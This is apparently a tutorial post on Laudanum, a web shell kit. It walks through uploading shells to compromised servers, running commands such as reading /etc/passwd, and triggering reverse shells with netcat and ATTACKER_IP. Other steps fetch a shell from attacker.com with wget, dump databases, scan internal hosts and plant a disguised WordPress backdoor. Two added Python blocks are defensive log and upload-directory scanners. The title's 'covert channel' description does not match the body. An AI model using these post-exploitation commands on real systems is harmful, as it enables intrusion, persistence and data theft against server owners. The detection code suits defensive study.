laudanum: A covert channel tool for encrypting and tunneling data over a network

Laudanum is a collection of injectable files designed for penetration testers and security researchers to aid in web application testing. It is included in Kali Linux and provides various scripts (PHP, ASP, JSP, etc.) that can be uploaded to a compromised web server to assist in post-exploitation activities.


What is Laudanum?

Laudanum is a pre-packaged set of webshells and utilities used for:

  • Command execution (via web interfaces)
  • File upload/download
  • Database interaction
  • Port scanning
  • Reverse shell establishment

It is often used in penetration testing when an attacker gains file upload capabilities on a web server.


How Laudanum Works

Laudanum provides server-side scripts that, when uploaded to a vulnerable web server, allow an attacker to:

  • Execute system commands
  • Browse the filesystem
  • Perform network reconnaissance
  • Interact with databases
  • Set up reverse shells

The scripts are written in multiple languages (PHP, ASP, JSP, CFM) to work across different server environments.


Installation in Kali Linux

Laudanum is pre-installed in Kali Linux. You can find it at:

Bash
/usr/share/laudanum

If it’s not present, install it via:

Bash
sudo apt update && sudo apt install laudanum

Basic Usage

Uploading a Laudanum Script

  1. Identify a file upload vulnerability (e.g., in a web form).
  2. Upload a relevant script (e.g., cmd.php for PHP servers).
  3. Access the script via the browser or curl.

Example: Simple Command Execution

  • Upload cmd.php to the target server.
  • Access it via:
Bash
curl http://target.com/uploads/cmd.php?cmd=id

Output:

Bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Advanced Usage

Reverse Shell Setup

  1. Use shell.php (PHP reverse shell):
Bash
   # On attacker machine:
   nc -lvnp 4444

   # Trigger reverse shell via browser or curl:
   curl "http://target.com/uploads/shell.php?ip=ATTACKER_IP&port=4444"

Database Interaction

  • Use mssql.php for MSSQL queries:
Bash
curl "http://target.com/uploads/mssql.php?server=localhost&query=SELECT+*+FROM+users"

Port Scanning

  • Use portscan.php:
Bash
curl "http://target.com/uploads/portscan.php?host=192.168.1.1&port=80,22,443"

Command-Line Options

Laudanum scripts are typically controlled via HTTP GET/POST parameters:

  • cmd.php: ?cmd=whoami
  • shell.php: ?ip=ATTACKER_IP&port=4444
  • upload.php: ?file=/path/to/local/file&destination=/remote/path
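
Those parameter names (cmd, ip, port, query, host) and the convention of serving a script from an upload directory are what a defender can key on in web server access logs. The following is an added example, not code from Laudanum or from the original post: it parses combined-format access lines (constructed samples embedded below) and flags requests that match the usage shown in this post. The upload path prefixes /uploads/ and /wp-content/uploads/ are assumptions taken from the paths used on this page.

```python
"""Flag Laudanum-style web shell requests in a combined-format access log.

Added example (not part of Laudanum or the original post). The log lines below
are constructed; the parameter names are the ones the post lists for the scripts.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Server-side script extensions Laudanum ships (from the post's directory overview).
SCRIPT_EXTS = (".php", ".asp", ".aspx", ".jsp", ".cfm")

# Request parameters the post shows Laudanum scripts being driven by.
SUSPICIOUS_PARAMS = {"cmd", "ip", "port", "query", "host"}

# Paths that should hold user content, never executable scripts (assumption).
UPLOAD_DIRS = ("/uploads/", "/wp-content/uploads/")

# Apache/nginx "combined" log line up to the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return the reasons (possibly none) this request looks like web shell use."""
    reasons = []
    parts = urlsplit(entry["target"])
    path = parts.path.lower()
    params = set(parse_qs(parts.query, keep_blank_values=True))
    if not path.endswith(SCRIPT_EXTS):
        return reasons
    if any(d in path for d in UPLOAD_DIRS):
        # Strong signal: a server-side script executing from an upload directory.
        reasons.append("server-side script served from an upload directory")
        hits = params & SUSPICIOUS_PARAMS
        if hits:
            reasons.append("driven by parameter(s): " + ", ".join(sorted(hits)))
    elif "cmd" in params:
        # Weaker signal: a 'cmd' parameter handed to a script elsewhere.
        reasons.append("'cmd' parameter passed to a script outside upload paths")
    return reasons


def scan(lines):
    """Return (client ip, target, status, reasons) for every flagged request."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["target"], entry["status"], reasons))
    return findings


# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.5 - - [10/May/2024:12:00:07 +0000] "POST /upload HTTP/1.1" 302 0
203.0.113.5 - - [10/May/2024:12:00:09 +0000] "GET /uploads/cmd.php?cmd=id HTTP/1.1" 200 61
203.0.113.5 - - [10/May/2024:12:00:15 +0000] "GET /uploads/shell.php?ip=203.0.113.5&port=4444 HTTP/1.1" 200 0
198.51.100.9 - - [10/May/2024:12:01:00 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 88213
198.51.100.9 - - [10/May/2024:12:01:03 +0000] "GET /search.php?query=shoes HTTP/1.1" 200 4020
198.51.100.9 - - [10/May/2024:12:01:09 +0000] "GET /admin/tools.php?cmd=whoami HTTP/1.1" 200 310
""".splitlines()

if __name__ == "__main__":
    for src, target, status, reasons in scan(SAMPLE_LOG):
        print(f"{src} {status} {target}")
        for r in reasons:
            print("    -", r)
```

The search.php line is deliberately left unflagged: a query parameter on an ordinary application script is normal, so the parameter names only count once the script sits where uploads are stored. Point scan() at real access logs and tune UPLOAD_DIRS to the site's actual upload paths.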

Laudanum Directory Structure Overview

1. /usr/share/laudanum/asp

  • Purpose: Active Server Pages (ASP) scripts for Windows-based servers.
  • Key Files:
      • cmd.asp (Execute OS commands)
      • shell.asp (Reverse shell)
      • upload.asp (File upload)
  • Example Usage:
Bash
curl "http://target.com/uploads/cmd.asp?cmd=whoami"

2. /usr/share/laudanum/aspx

  • Purpose: ASP.NET scripts for modern Windows servers.
  • Key Files:
      • cmd.aspx (Command execution)
      • dns.aspx (DNS lookup)
  • Example Usage:
Bash
curl "http://target.com/uploads/cmd.aspx?cmd=ipconfig"

3. /usr/share/laudanum/cfm

  • Purpose: ColdFusion Markup Language scripts (rare but still used in legacy systems).
  • Key Files:
      • cmd.cfm (Command execution)
  • Example Usage:
Bash
curl "http://target.com/uploads/cmd.cfm?cmd=netstat -an"

4. /usr/share/laudanum/jsp

  • Purpose: Java Server Pages scripts for Tomcat/JBoss environments.
  • Key Files:
      • cmd.jsp (Command execution)
      • shell.jsp (Reverse shell)
  • Example Usage:
Bash
curl "http://target.com/uploads/cmd.jsp?cmd=uname -a"

5. /usr/share/laudanum/php

  • Purpose: PHP scripts (most widely used).
  • Key Files:
      • cmd.php (Execute commands)
      • shell.php (Reverse shell)
      • upload.php (File upload)
      • portscan.php (Network scanning)
      • mysql.php (MySQL interaction)
  • Example Usage:
Bash
  # Command execution:
  curl "http://target.com/uploads/cmd.php?cmd=id"

  # Reverse shell (attacker listens on 4444):
  curl "http://target.com/uploads/shell.php?ip=ATTACKER_IP&port=4444"

6. /usr/share/laudanum/wordpress

  • Purpose: WordPress-specific backdoors (if WP is compromised).
  • Key Files:
      • wp-shell.php (Standalone PHP shell disguised as a WP file)
  • Example Usage:
Bash
curl "http://target.com/wp-content/uploads/wp-shell.php?cmd=ls"

7. /usr/share/laudanum/helpers

  • Purpose: Miscellaneous utilities (e.g., wget-based downloaders).
  • Key Files:
      • wget.sh (Download files via wget)
  • Example Usage:
Bash
  # On the target (if shell access is available):
  wget http://attacker.com/laudanum/cmd.php -O /var/www/html/uploads/cmd.php
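
Every directory above ships server-side scripts meant to end up inside a web-served upload path, so a periodic audit of upload directories is a cheap control. The following is an added example, not code from Laudanum or from the original post: it walks an upload tree and reports files with the script extensions listed in this overview (asp, aspx, cfm, jsp, php) as well as files whose body calls a command-execution function regardless of extension. The directory tree it audits is constructed in a temporary folder for the demo, and the list of function names to look for is an assumption about what such shells call, not a list taken from Laudanum's sources.

```python
"""Audit an upload directory for server-side scripts such as the Laudanum shells.

Added example (not part of Laudanum or the original post). Extensions come from
the post's directory overview; the sample tree is constructed for the demo.
"""
import os
import re
import tempfile

# Server-side script extensions listed in the post's directory overview.
SCRIPT_EXTS = {".php", ".asp", ".aspx", ".cfm", ".jsp"}

# Command-execution functions a PHP shell would call (assumed watch list).
EXEC_CALL_RE = re.compile(
    r"\b(system|shell_exec|exec|passthru|popen|proc_open)\s*\(", re.IGNORECASE
)


def audit_dir(root):
    """Return a sorted list of (path relative to root, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            ext = os.path.splitext(name)[1].lower()
            # Rule 1: an upload tree should never contain a server-side script.
            if ext in SCRIPT_EXTS:
                findings.append((rel, f"server-side script extension {ext} in upload directory"))
            # Rule 2: inspect the first 64 KiB of every file for exec-style calls,
            # whatever the extension says the file is.
            try:
                with open(full, "rb") as fh:
                    head = fh.read(64 * 1024)
            except OSError:
                continue
            m = EXEC_CALL_RE.search(head.decode("utf-8", "replace"))
            if m:
                findings.append((rel, f"calls command-execution function {m.group(1)}()"))
    return sorted(findings)


# Constructed fixtures: two harmless uploads, one script, one mislabelled script.
SAMPLE_FILES = {
    "photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg stand-in",
    "readme.txt": b"uploaded notes, nothing executable here",
    "cmd.php": b"<?php /* constructed fixture */ system('uname -a'); ?>",
    "avatar.png": b"<?php /* constructed fixture */ passthru('id'); ?>",
}


def build_sample_tree(base):
    """Write the constructed fixtures under base/uploads and return that path."""
    uploads = os.path.join(base, "uploads")
    os.makedirs(uploads, exist_ok=True)
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(uploads, name), "wb") as fh:
            fh.write(body)
    return uploads


def demo():
    """Build the constructed tree in a temporary directory and audit it."""
    base = tempfile.mkdtemp(prefix="upload-audit-")
    return audit_dir(build_sample_tree(base))


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run audit_dir() against the real upload root from cron or a file-integrity job; the rule-1 findings are the ones to act on immediately, since the server-side language the page lists for each directory will execute them if the upload path is not configured to serve static content only.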

Practical Use Cases

1. Post-Exploitation Command Execution

  • After uploading cmd.php:
Bash
curl "http://target.com/uploads/cmd.php?cmd=cat+/etc/passwd"

2. Reverse Shell Setup

  • Attacker sets up listener:
Bash
nc -lvnp 4444
  • Victim executes (via shell.php):
Bash
curl "http://target.com/uploads/shell.php?ip=10.0.0.1&port=4444"

3. Internal Network Scanning

  • Using portscan.php:
Bash
curl "http://target.com/uploads/portscan.php?host=192.168.1.1&port=22,80,443"

4. Database Dumping (MySQL)

  • Using mysql.php:
Bash
curl "http://target.com/uploads/mysql.php?host=localhost&user=root&pass=password&query=SELECT+*+FROM+users"

Real-World Use Cases

  1. Post-Exploitation: After exploiting a file upload vulnerability, upload Laudanum to maintain access.
  2. Internal Network Recon: Use portscan.php to map internal networks.
  3. Database Dumping: Extract database credentials using mssql.php or mysql.php.
  4. Privilege Escalation: Execute commands to exploit misconfigurations.

Troubleshooting Tips

Issue                    Solution
Script not executing     Check server language (PHP/ASP/JSP)
403 Forbidden            Ensure correct file permissions (chmod +x)
Reverse shell fails      Check firewall rules, use alternate ports
Database errors          Verify correct DB credentials in script
